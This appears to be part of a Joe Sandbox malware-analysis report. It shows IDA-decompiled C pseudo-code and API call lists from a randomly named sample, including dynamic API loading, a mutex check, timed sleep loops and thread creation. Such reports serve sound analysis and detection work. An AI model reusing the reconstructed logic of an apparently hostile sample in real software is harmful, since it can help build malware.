    					}
    					_t229 = E003B1210();
    					_push(8);
    					 *0x3b8580 = _t229;
    					L0039A47E();
    					_t468 = _t468 + 4;
    					__eflags = _t229 - _t333;
    					if(_t229 == _t333) {
    						_t465 = 0;
    						__eflags = 0;
    					} else {
    						_t465 = E0039E850(_t229);
    					}
    					_t230 = E00393D50(_t465); // executed
    					__eflags = _t230;
    					if(_t230 != 0) {
    						__eflags = _t465 - _t333;
    						if(__eflags != 0) {
    							E00392420(_t465);
    							_push(_t465);
    							L00391CB0();
    							_t468 = _t468 + 4;
    						}
    						_t355 =  *0x3b8628; // 0x593938
    						 *0x3b8570 = _t333;
    						 *0x3b8584 = _t333;
    						 *0x3b8574 = _t333;
    						 *0x3b8578 = _t333;
    						 *((intOrPtr*)( *((intOrPtr*)(_t355 + 0xcc))))(0x3b8594, 0x800);
    						E00391B20(_t466 - 0x5c0,  *((intOrPtr*)(_t355 + 0xcc)), __eflags);
    						_t233 = E0039BB30(_t466 - 0xc);
    						_push(0x34);
    						 *(_t466 - 0x58) = _t333;
    						 *(_t466 - 0x28) = _t333;
    						L0039A47E();
    						_t471 = _t468 + 4;
    						__eflags = _t233 - _t333;
    						if(__eflags == 0) {
    							 *(_t466 - 0x5b8) = _t333;
    						} else {
    							 *(_t466 - 0x5b8) = E003970B0(_t233);
    						}
    						E00399090(__eflags, _t466 - 0x9c0, 3);
    						E0039F550(_t466 - 0x50, _t333, _t466 - 0x9c0, 0xa, _t466 - 0x54, _t466 - 0x50);
    						E00391F00(_t466 - 0xc,  *((intOrPtr*)(_t466 - 0x54)),  *((intOrPtr*)(_t466 - 0x50))); // executed
    						_t240 = E003969F0(_t466 - 0x5b8, _t466 - 0xc, _t466 - 0x5b8); // executed
    						_t468 = _t471 + 0x24;
    						__eflags = _t240;
    						if(_t240 != 0) {
    							 *(_t466 - 0x5c0) = _t466 - 0xc;
    							__eflags = E003A0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
    							if(__eflags == 0) {
    								goto L18;
    							}
    							E00395700( *((intOrPtr*)(_t466 - 0x5bc)), __eflags);
    							 *0x3b85ac = _t333;
    							 *(_t466 - 0x30) = _t333;
    							 *(_t466 - 0x2c) = _t333;
    							 *(_t466 - 0x14) = _t333;
    							 *(_t466 - 0x10) = _t333;
    							 *(_t466 - 0x3c) = _t333;
    							 *(_t466 - 0x38) = _t333;
    							 *(_t466 - 0x44) = _t333;
    							 *(_t466 - 0x40) = _t333;
    							 *((intOrPtr*)( *( *0x3b8628)))(_t333, _t333, E003B08A0, _t466 - 0x5c0, _t333, _t466 - 0x74);
    							 *(_t466 - 0x24) = _t333;
    							while(1) {
    								_t249 =  *(_t466 - 0x5b8);
    								_t369 = 0;
    								 *0x3b857c = 0;
    								 *(_t466 - 0x20) = _t333;
    								__eflags =  *((intOrPtr*)(_t249 + 0x18)) - _t333;
    								if(__eflags <= 0) {
    									goto L85;
    								}
    								do {
    									_t434 =  *( *((intOrPtr*)(_t249 + 0x20)) + _t369 * 4);
    									_t255 = L003994D0(_t466 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x1c)) + _t369 * 4)), _t434); // executed
    									__eflags = _t255;
    									if(_t255 != 0) {
    										__imp___time64(_t333);
    										_t459 = _t434;
    										_t435 =  *0x3b857c; // 0x1
    										_t473 = _t468 + 4;
    										_t465 = _t255;
    										_t256 = _t255 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24)) + _t435 * 8));
    										__eflags = _t256;
    										asm("sbb ebx, [ecx+edx*8+0x4]");
    										 *(_t466 - 0x48) = _t459;
    										if(__eflags < 0) {
    											L33:
    											_t333 = 0; // executed
    											_t258 = E003A1B80(_t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x28); // executed
    											_t468 = _t473 + 0xc;
    											__eflags = _t258;
    											if(_t258 == 0) {
    												 *(_t466 - 0x20) =  *(_t466 - 0x20) + 1;
    												 *( *((intOrPtr*)(_t466 - 0x5bc)) + 0xc) =  *(_t466 - 0x28);
    												_t261 = _t465 -  *(_t466 - 0x3c);
    												__eflags = _t261;
    												asm("sbb edx, [ebp-0x38]");
    												 *(_t466 - 0x48) = _t459;
    												if(__eflags < 0) {
    													L42:
    													E003942A0(__eflags, _t466 - 0x5c0); // executed
    													_t474 = _t468 + 4;
    													_t263 = E003A12C0(); // executed
    													_push(4);
    													__eflags = _t263 - _t333;
    													if(__eflags >= 0) {
    														if(__eflags != 0) {
    															_push(_t466 - 0x9c0);
    															E00399090(__eflags);
    															E00399090(__eflags, _t466 - 0xdc0, 7);
    															_push(_t466 - 0xdc0);
    															_push(_t466 - 0x9c0);
    															_push(0xe);
    															_t440 = _t466 - 0x5c0;
    															_push(_t440); // executed
    														} else {
    															_push(_t466 - 0x9c0);
    															E00399090(__eflags);
    															E00399090(__eflags, _t466 - 0xdc0, 6);
    															_push(_t466 - 0xdc0);
    															_t440 = _t466 - 0x9c0;
    															_push(_t440);
    															_push(0xe);
    															_push(_t466 - 0x5c0);
    														}
    													} else {
    														_push(_t466 - 0x9c0);
    														E00399090(__eflags);
    														E00399090(__eflags, _t466 - 0xdc0, 5);
    														_t440 = _t466 - 0xdc0;
    														_push(_t440);
    														_push(_t466 - 0x9c0);
    														_push(0xe);
    														_push(_t466 - 0x5c0);
    													}
    													_t267 = E00395A10(); // executed
    													_t475 = _t474 + 0x20;
    													 *(_t466 - 0x48) = _t333;
    													do {
    														__imp___time64(0);
    														_t465 = _t267;
    														_t268 =  *0x3b8570; // 0x0
    														_t468 = _t475 + 4;
    														_t459 = _t440;
    														__eflags = _t268 - 2;
    														if(_t268 == 2) {
    															L52:
    															_t270 = E003936E0(_t459, _t465, _t466 - 0xc, _t466 - 0x5c0,  *(_t466 - 0x14),  *(_t466 - 0x10)); // executed
    															_t468 = _t468 + 0x10;
    															asm("sbb edx, 0x0");
    															 *(_t466 - 0x14) = _t465 - 0x708;
    															 *(_t466 - 0x10) = _t459;
    															__eflags = _t270 - 1;
    															if(_t270 == 1) {
    																 *0x3b85ac = _t270;
    															}
    															L54:
    															_t272 = _t465 -  *(_t466 - 0x44);
    															__eflags = _t272;
    															asm("sbb ecx, [ebp-0x40]");
    															 *(_t466 - 0x5c) = _t459;
    															if(__eflags < 0) {
    																L61:
    																_t465 = _t465 -  *(_t466 - 0x30);
    																__eflags = _t465;
    																asm("sbb edi, [ebp-0x2c]");
    																 *(_t466 - 0x5c) = _t459;
    																if(__eflags < 0) {
    																	L68:
    																	_t273 = E00399890( *((intOrPtr*)(_t466 - 0x5bc)));
    																	__eflags = _t273;
    																	if(_t273 == 0) {
    																		L83:
    																		_t333 = 0;
    																		__eflags = 0;
    																		goto L84;
    																	}
    																	_push(1);
    																	_push(_t466 - 0x5c0);
    																	_t274 = E00395A10();
    																	_t468 = _t468 + 8;
    																	__eflags = _t274;
    																	if(__eflags == 0) {
    																		goto L83;
    																	}
    																	_t440 = _t466 - 0x5c0;
    																	_t275 = E00397560(_t333, __eflags, _t440);
    																	_t468 = _t468 + 4;
    																	__eflags = _t275;
    																	if(_t275 == 0) {
    																		__eflags =  *0x3b85ac;
    																		if( *0x3b85ac != 0) {
    																			L88:
    																			E00391700(_t466 - 0xc);
    																			E0039F850(_t333, _t466 - 0x5c0);
    																			E0039C930(_t466 - 4);
    																			_t333 = 0;
    																			__eflags = 0;
    																			goto L89;
    																		}
    																		goto L83;
    																	}
    																	__eflags =  *0x3b85ac;
    																	if( *0x3b85ac != 0) {
    																		goto L88;
    																	}
    																	_t279 =  *0x3b8584; // 0x1
    																	_t465 = 0xa;
    																	__eflags = _t279;
    																	if(_t279 == 0) {
    																		_t280 =  *(_t466 - 0x24);
    																		__eflags = _t280;
    																		if(_t280 <= 0) {
    																			while(1) {
    																				L76:
    																				_t390 =  *0x3b8584; // 0x1
    																				__eflags = _t390;
    																				if(_t390 != 0) {
    																					goto L78;
    																				}
    																				_t440 =  *0x3b8628; // 0x593938
    																				 *((intOrPtr*)( *((intOrPtr*)(_t440 + 0xc8))))(0x4e20);
    																				_t465 = _t465 - 1;
    																				__eflags = _t465;
    																				if(_t465 > 0) {
    																					continue;
    																				}
    																				goto L78;
    																			}
    																			goto L78;
    																		}
    																		L75:
    																		_t284 = _t280 - 1;
    																		__eflags = _t284;
    																		 *(_t466 - 0x24) = _t284;
    																		_t465 = 1;
    																		goto L76;
    																	}
    																	_t158 = _t465 - 5; // 0x5
    																	_t280 = _t158;
    																	 *0x3b8584 = 0;
    																	goto L75;
    																}
    																if(__eflags > 0) {
    																	L64:
    																	_t465 = E0039F2D0(_t466 - 0x5c0);
    																	_t286 = E003999A0(_t333, _t466 - 0x19, _t459, _t285, _t285);
    																	_push(8);
    																	__eflags = _t286;
    																	if(__eflags == 0) {
    																		_push(_t466 - 0x9c0);
    																		E00399090(__eflags);
    																		E00399090(__eflags, _t466 - 0xdc0, 0xa);
    																		_push(_t466 - 0xdc0);
    																		_t446 = _t466 - 0x9c0;
    																		_push(_t446);
    																		_push(0xe);
    																		_push(_t466 - 0x5c0);
    																	} else {
    																		_push(_t466 - 0x9c0);
    																		E00399090(__eflags);
    																		E00399090(__eflags, _t466 - 0xdc0, 9);
    																		_t446 = _t466 - 0xdc0;
    																		_push(_t446);
    																		_push(_t466 - 0x9c0);
    																		_push(0xe);
    																		_push(_t466 - 0x5c0);
    																	}
    																	E00395A10();
    																	_t292 = E0039BB40(_t465);
    																	__imp___time64(0);
    																	_t468 = _t468 + 0x28;
    																	 *(_t466 - 0x30) = _t292;
    																	 *(_t466 - 0x2c) = _t446;
    																	goto L68;
    																}
    																__eflags = _t465 - 0x7080;
    																if(_t465 <= 0x7080) {
    																	goto L68;
    																}
    																goto L64;
    															}
    															if(__eflags > 0) {
    																L57:
    																_t448 =  *0x3b857c; // 0x1
    																_t298 = _t465 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x28)) + _t448 * 8));
    																__eflags = _t298;
    																_t333 = _t459;
    																asm("sbb ebx, [ecx+edx*8+0x4]");
    																 *(_t466 - 0x5c) = _t459;
    																if(__eflags < 0) {
    																	goto L61;
    																}
    																if(__eflags > 0) {
    																	L60:
    																	 *(_t466 - 0x44) = _t465;
    																	 *(_t466 - 0x40) = _t459;
    																	_t300 = E00391FE0(_t333, _t459, _t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x5b8); // executed
    																	_t468 = _t468 + 0xc;
    																	__eflags = _t300;
    																	if(_t300 != 0) {
    																		_t301 = E003A0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
    																		__eflags = _t301;
    																		if(_t301 == 0) {
    																			goto L88;
    																		}
    																		 *0x3b857c = 0;
    																		goto L83;
    																	}
    																	goto L61;
    																}
    																__eflags = _t298 - 0x3840;
    																if(_t298 <= 0x3840) {
    																	goto L61;
    																}
    																goto L60;
    															}
    															__eflags = _t272 - 0x4b0;
    															if(_t272 <= 0x4b0) {
    																goto L61;
    															}
    															goto L57;
    														}
    														_t303 = _t465 -  *(_t466 - 0x14);
    														__eflags = _t303;
    														asm("sbb ecx, [ebp-0x10]");
    														 *(_t466 - 0x5c) = _t459;
    														if(__eflags < 0) {
    															goto L54;
    														}
    														if(__eflags > 0) {
    															goto L52;
    														}
    														__eflags = _t303 - 0xe10;
    														if(_t303 <= 0xe10) {
    															goto L54;
    														}
    														goto L52;
    														L78:
    														_t267 =  *(_t466 - 0x48) + 1;
    														 *(_t466 - 0x48) = _t267;
    														__eflags = _t267 - 0x64;
    													} while (_t267 < 0x64);
    													goto L83;
    												}
    												if(__eflags > 0) {
    													L40:
    													_t313 = E0039AC90( *(_t466 - 0x5b8), _t466 - 0x5c0); // executed
    													_t468 = _t468 + 8;
    													__eflags = _t313;
    													if(__eflags == 0) {
    														goto L84;
    													}
    													 *(_t466 - 0x3c) = _t465;
    													 *(_t466 - 0x38) = _t459;
    													goto L42;
    												}
    												__eflags = _t261 - 0xe10;
    												if(__eflags <= 0) {
    													goto L42;
    												}
    												goto L40;
    											}
    											__eflags = _t258 - 1;
    											if(_t258 != 1) {
    												E0039C870(_t466 - 0x5c0, _t258);
    												_t468 = _t468 + 8;
    											}
    											_t405 =  *0x3b8628; // 0x593938
    											 *((intOrPtr*)( *((intOrPtr*)(_t405 + 0xc8))))(0x3e8);
    											goto L84;
    										}
    										if(__eflags > 0) {
    											L28:
    											_t318 = E0039D890(_t465, __eflags, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x58); // executed
    											_t473 = _t473 + 0xc;
    											__eflags = _t318;
    											if(_t318 == 0) {
    												_t319 =  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24));
    												_t407 =  *0x3b857c; // 0x1
    												 *(_t319 + _t407 * 8) = _t465;
    												_t455 =  *0x3b857c; // 0x1
    												 *(_t319 + 4 + _t455 * 8) = _t459;
    												goto L33;
    											}
    											__eflags = _t318 - 1;
    											if(_t318 != 1) {
    												E0039C870(_t466 - 0x5c0, _t318);
    												_t468 = _t473 + 8;
    											}
    											_t320 =  *0x3b8628; // 0x593938
    											 *((intOrPtr*)( *((intOrPtr*)(_t320 + 0xc8))))(0x3e8);
    											goto L83;
    										}
    										__eflags = _t256 - 0x3840;
    										if(__eflags <= 0) {
    											goto L33;
    										}
    										goto L28;
    									}
    									_t457 =  *0x3b8628; // 0x593938
    									 *((intOrPtr*)( *((intOrPtr*)(_t457 + 0xc8))))(0x3e8);
    									L84:
    									_t385 =  *0x3b857c; // 0x1
    									_t249 =  *(_t466 - 0x5b8);
    									_t369 = _t385 + 1;
    									 *0x3b857c = _t369;
    									__eflags = _t369 -  *((intOrPtr*)(_t249 + 0x18));
    								} while (__eflags < 0);
    								L85:
    								_t251 = E003B0A40(_t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5b8);
    								_t468 = _t468 + 8;
    								__eflags = _t251;
    								if(_t251 == 0) {
    									__eflags =  *(_t466 - 0x20) - _t333;
    									if(__eflags == 0) {
    										L003B0D30(_t333, _t459, _t465, __eflags, _t466 - 0xc, _t466 - 0x5c0);
    										_t468 = _t468 + 8;
    									}
    								}
    							}
    						} else {
    							L18:
    							E00391700(_t466 - 0xc);
    							E0039F850(_t333, _t466 - 0x5c0);
    							E0039C930(_t466 - 4);
    							goto L89;
    						}
    					} else {
    						E0039C930(_t466 - 4);
    						goto L89;
    					}
    				} else {
    					E003B0BB0(_t333, _t479);
    					E0039C930(_t466 - 4);
    					goto L89;
    				}
    			}
    0x0039ff40
    0x0039ff49
    0x0039ff58
    0x0039ff5d
    0x0039ff60
    0x0039ff62
    0x0039ff96
    0x0039ff99
    0x0039ff9f
    0x0039ffa2
    0x0039ffa8
    0x00000000
    0x0039ffa8
    0x0039ff64
    0x0039ff67
    0x0039ff71
    0x0039ff76
    0x0039ff76
    0x0039ff79
    0x0039ff89
    0x00000000
    0x0039ff89
    0x0039ff42
    0x0039ff47
    0x00000000
    0x00000000
    0x00000000
    0x0039ff47
    0x0039fefd
    0x0039ff0e
    0x003a0374
    0x003a0374
    0x003a037a
    0x003a0380
    0x003a0381
    0x003a0387
    0x003a0387
    0x003a0390
    0x003a039b
    0x003a03a0
    0x003a03a3
    0x003a03a5
    0x003a03ab
    0x003a03ae
    0x003a03bf
    0x003a03c4
    0x003a03c4
    0x003a03ae
    0x003a03a5
    0x0039fe34
    0x0039fe34
    0x0039fe37
    0x0039fe42
    0x0039fe4a
    0x00000000
    0x0039fe4a
    0x0039fd58
    0x0039fd5b
    0x00000000
    0x0039fd5b
    0x0039fceb
    0x0039fceb
    0x0039fcf3
    0x00000000
    0x0039fcf3

    APIs
    • Sleep.KERNELBASE(00000001), ref: 0039FC40
    • SetCurrentDirectoryW.KERNELBASE(?), ref: 0039FCB3
    • srand.MSVCRT ref: 0039FCC4
      • Part of subcall function 0039EB30: LoadLibraryW.KERNEL32(?), ref: 0039EB82
      • Part of subcall function 0039EB30: LoadLibraryW.KERNEL32(?), ref: 0039EBA9
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBD7
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBFF
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC27
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC4F
      • Part of subcall function 0039EB30: GetProcAddress.KERNEL32(74E30000,?), ref: 0039EC77
      • Part of subcall function 0039BAF0: CoInitializeEx.OLE32(00000000,00000000), ref: 0039BAF4
      • Part of subcall function 0039BAF0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0039BB13
    • ExitProcess.KERNEL32 ref: 003A04F6
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00393500: CreateMutexW.KERNELBASE(?,00000001,?), ref: 0039358B
      • Part of subcall function 00393500: ExitProcess.KERNEL32 ref: 003935AE
      • Part of subcall function 003B0BB0: ??2@YAPAXI@Z.MSVCRT ref: 003B0C80
      • Part of subcall function 003B0BB0: ??3@YAXPAX@Z.MSVCRT ref: 003B0D1D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 54%
    			E003B2480(void* __eax, long __ebx, LONG* __edi, long __esi) {
    				signed int _t18;
    				signed int _t19;
    				signed int _t20;
    				int* _t21;
    				int _t22;
    				int _t24;
    				signed int _t31;
    				long _t32;
    				signed int _t33;
    				signed int _t36;
    				LONG* _t43;
    				signed int _t46;
    				void* _t48;
    				void* _t54;
    
    				L0:
    				while(1) {
    					L0:
    					_t43 = __edi;
    					_t32 = __ebx;
    					if(__eax == __esi) {
    						break;
    					}
    					L3:
    					Sleep(0x3e8);
    					if(InterlockedCompareExchange(__edi, __esi, __ebx) == __ebx) {
    						L4:
    						_t46 = 1;
    						__eflags = 1;
    					} else {
    						continue;
    					}
    					L5:
    					_t18 =  *0x3b8c38; // 0x2
    					if(_t18 != _t46) {
    						L7:
    						_t19 =  *0x3b8c38; // 0x2
    						__eflags = _t19;
    						if(__eflags != 0) {
    							L11:
    							 *0x3b865c = _t46;
    							goto L12;
    						} else {
    							L8:
    							 *0x3b8c38 = _t46;
    							_t31 = E003A1B59(0x3b3240, 0x3b324c); // executed
    							__eflags = _t31;
    							if(__eflags == 0) {
    								goto L12;
    							} else {
    								L10:
    								goto L38;
    							}
    						}
    					} else {
    						L6:
    						_push(0x1f);
    						L0039F19C();
    						L12:
    						_t20 =  *0x3b8c38; // 0x2
    						if(_t20 == _t46) {
    							_push(0x3b323c);
    							_push(0x3b3234); // executed
    							L003927A8(); // executed
    							 *0x3b8c38 = 2;
    						}
    						if( *((intOrPtr*)(_t48 - 0x20)) == _t32) {
    							InterlockedExchange(_t43, _t32);
    						}
    						_t54 =  *0x3b8c40 - _t32; // 0x0
    						if(_t54 != 0) {
    							_push(0x3b8c40);
    							if(E00393D60(_t32, _t43, _t46, _t54) != 0) {
    								 *0x3b8c40(_t32, 2, _t32);
    							}
    						}
    						_t21 = __imp___wcmdln;
    						if( *_t21 == _t32) {
    							L38:
    							 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
    							_t22 = 0xff;
    						} else {
    							L20:
    							_t24 =  *_t21;
    							while(1) {
    								L21:
    								 *(_t48 - 0x24) = _t24;
    								_t33 =  *_t24 & 0x0000ffff;
    								if(_t33 > 0x20 || _t33 != _t32 &&  *(_t48 - 0x1c) != _t32) {
    									goto L32;
    								} else {
    									goto L24;
    								}
    								while(1) {
    									L24:
    									_t36 =  *_t24 & 0x0000ffff;
    									if(_t36 == _t32 || _t36 > 0x20) {
    										break;
    									}
    									L26:
    									_t24 = _t24 + 2;
    									 *(_t48 - 0x24) = _t24;
    								}
    								L27:
    								__eflags =  *(_t48 - 0x40) & 0x00000001;
    								if(( *(_t48 - 0x40) & 0x00000001) == 0) {
    									_t33 = 0xa;
    								} else {
    									_t33 =  *(_t48 - 0x3c) & 0x0000ffff;
    								}
    								_push(_t33);
    								_push(_t24);
    								_push(_t32);
    								_push(0x390000); // executed
    								L0039FBF0(); // executed
    								 *0x3b8658 = _t24;
    								__eflags =  *0x3b864c - _t32; // 0x0
    								if(__eflags == 0) {
    									L31:
    									exit(_t24);
    									goto L32;
    								}
    								L35:
    								__eflags =  *0x3b865c - _t32; // 0x0
    								if(__eflags == 0) {
    									__imp___cexit();
    								}
    								L37:
    								 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
    								_t22 =  *0x3b8658; // 0x0
    								goto L39;
    								L32:
    								__eflags = _t33 - 0x22;
    								if(_t33 == 0x22) {
    									__eflags =  *(_t48 - 0x1c) - _t32;
    									_t12 =  *(_t48 - 0x1c) == _t32;
    									__eflags = _t12;
    									 *(_t48 - 0x1c) = 0 | _t12;
    								}
    								_t24 = _t24 + 2;
    							}
    						}
    					}
    					L39:
    					return E003B2829(_t22);
    					L40:
    				}
    				L2:
    				_t46 = 1;
    				 *((intOrPtr*)(_t48 - 0x20)) = 1;
    				goto L5;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 86%
    			E0039A590(intOrPtr* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				long _v28;
    				intOrPtr _v32;
    				signed int _v40;
    				intOrPtr _v48;
    				signed int _v60;
    				char _v260;
    				void* __edi;
    				signed int _t178;
    				signed int _t179;
    				signed int _t180;
    				signed int _t181;
    				signed int _t182;
    				signed int _t186;
    				void _t187;
    				void* _t188;
    				intOrPtr _t202;
    				signed int _t207;
    				signed int _t210;
    				intOrPtr _t211;
    				intOrPtr _t212;
    				signed int _t214;
    				signed int _t217;
    				signed int _t222;
    				signed int _t223;
    				signed int _t229;
    				signed int _t233;
    				intOrPtr _t235;
    				signed int _t236;
    				intOrPtr _t239;
    				signed int _t242;
    				intOrPtr* _t245;
    				void* _t252;
    				intOrPtr _t262;
    				intOrPtr _t264;
    				signed int _t273;
    				intOrPtr _t276;
    				signed int _t278;
    				signed int _t282;
    				signed int _t286;
    				signed int _t289;
    				void* _t290;
    				intOrPtr _t302;
    				signed int _t306;
    				signed int _t310;
    				signed int _t312;
    				intOrPtr _t313;
    				signed int _t316;
    				intOrPtr _t320;
    				signed int _t324;
    				signed int _t332;
    				intOrPtr* _t333;
    				void* _t334;
    				void* _t336;
    
    				_t333 = __ecx;
    				_t252 = 0;
    				_t332 = 0;
    				if( *__ecx <= 0) {
    					L61:
    					return 1;
    				} else {
    					do {
    						if(_t252 != 0) {
    							_t178 =  *_t252;
    							__eflags = _t178;
    							if(_t178 != 0) {
    								E0039BB40(_t178);
    								_t334 = _t334 + 4;
    							}
    							_t179 =  *(_t252 + 4);
    							__eflags = _t179;
    							if(_t179 != 0) {
    								E0039BB40(_t179);
    								_t334 = _t334 + 4;
    							}
    							_t180 =  *(_t252 + 8);
    							__eflags = _t180;
    							if(_t180 != 0) {
    								E0039BB40(_t180);
    								_t334 = _t334 + 4;
    							}
    							_t181 =  *(_t252 + 0x10);
    							__eflags = _t181;
    							if(_t181 != 0) {
    								E0039BB40(_t181);
    								_t334 = _t334 + 4;
    							}
    							_t182 =  *(_t252 + 0xc);
    							__eflags = _t182;
    							if(_t182 != 0) {
    								E0039BB40(_t182);
    								_t334 = _t334 + 4;
    							}
    							goto L14;
    						} else {
    							_t188 = E003A1D90(0x1c, _t252);
    							_t334 = _t334 + 8;
    							_t252 = _t188;
    							L14:
    							 *_t252 = 0;
    							 *(_t252 + 4) = 0;
    							 *(_t252 + 8) = 0;
    							 *(_t252 + 0xc) = 0;
    							_t8 = _t252 + 0xc; // 0xc
    							 *(_t252 + 0x10) = 0;
    							 *((intOrPtr*)(_t252 + 0x14)) = 0;
    							_t11 = _t252 + 0x14; // 0x14
    							 *((intOrPtr*)(_t252 + 0x18)) = 0;
    							_t13 = _t252 + 0x10; // 0x10
    							_t14 = _t252 + 8; // 0x8
    							_t16 = _t252 + 4; // 0x4
    							_t186 = E00399540( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)), _t332, _t16, _t14, _t13, _t11, _t8); // executed
    							_v20 = _t186;
    							_t187 = E00394F50( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)));
    							 *_t252 = _t187;
    							if(_v20 == 0) {
    								goto L48;
    							}
    							_t340 = _t187;
    							if(_t187 == 0) {
    								goto L48;
    							}
    							_v8 = 0xffffffff;
    							_v16 = 0;
    							E00399090(_t340,  &_v260, 0xc2);
    							_t202 =  *0x3b8628; // 0x593938
    							_t334 = _t334 + 8;
    							_push( &_v260);
    							_push( *(_t252 + 4));
    							if( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xe0))))() != 0) {
    								E00399090(__eflags,  &_v260, 0xbe);
    								_t302 =  *0x3b8628; // 0x593938
    								_t334 = _t334 + 8;
    								_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xe0))))( *(_t252 + 4),  &_v260);
    								__eflags = _t207;
    								if(__eflags != 0) {
    									E00399090(__eflags,  &_v260, 0xb);
    									_t262 =  *0x3b8628; // 0x593938
    									_t336 = _t334 + 8;
    									_t210 =  *((intOrPtr*)( *((intOrPtr*)(_t262 + 0xe0))))( *(_t252 + 4),  &_v260);
    									__eflags = _t210;
    									if(_t210 == 0) {
    										L34:
    										_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4));
    										_v16 = 1;
    										_v8 = 0;
    										__eflags =  *(_t211 + 0x4c);
    										if( *(_t211 + 0x4c) <= 0) {
    											L38:
    											_t212 =  *((intOrPtr*)(_t333 + 4));
    											_t264 =  *((intOrPtr*)(_t212 + _t332 * 4));
    											_t306 = _v8;
    											__eflags = _t306 -  *((intOrPtr*)(_t264 + 0x4c));
    											if(_t306 >=  *((intOrPtr*)(_t264 + 0x4c))) {
    												L42:
    												 *((intOrPtr*)(_t252 + 0x18)) = _a4;
    												_t214 = E003966C0( *(_t252 + 4));
    												_t334 = _t336 + 4;
    												_v20 = _t214;
    												CreateThread(0, 0, E003944B0, _t252, 0,  &_v28); // executed
    												_t252 = 0;
    												__eflags = _v16;
    												if(_v16 == 0) {
    													goto L48;
    												}
    												_t217 = _v8;
    												__eflags = _t217;
    												if(_t217 < 0) {
    													L62:
    													_t222 = E003A1D90( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) + 1 << 4,  *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48));
    													_t334 = _t334 + 8;
    													_v16 = _t222;
    													__eflags = _t222;
    													if(_t222 == 0) {
    														L46:
    														_t223 = _v20;
    														__eflags = _t223;
    														if(_t223 != 0) {
    															E0039BB40(_t223);
    															_t334 = _t334 + 4;
    														}
    														goto L48;
    													}
    													_t310 = _v20;
    													 *((intOrPtr*)(_t222 + ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c))) * 8)) = _t310;
    													__imp___time64(0);
    													_v48 = _t310;
    													_t312 = _v16;
    													_t273 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c)) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x4c));
    													 *(_t312 + 8 + _t273 * 8) = _t222;
    													 *((intOrPtr*)(_t312 + 0xc + _t273 * 8)) = _v48;
    													 *( *((intOrPtr*)( *((intOrPtr*)(_t333 + 4)) + _t332 * 4)) + 0x48) = _t312;
    													_t334 = _t334 + 4;
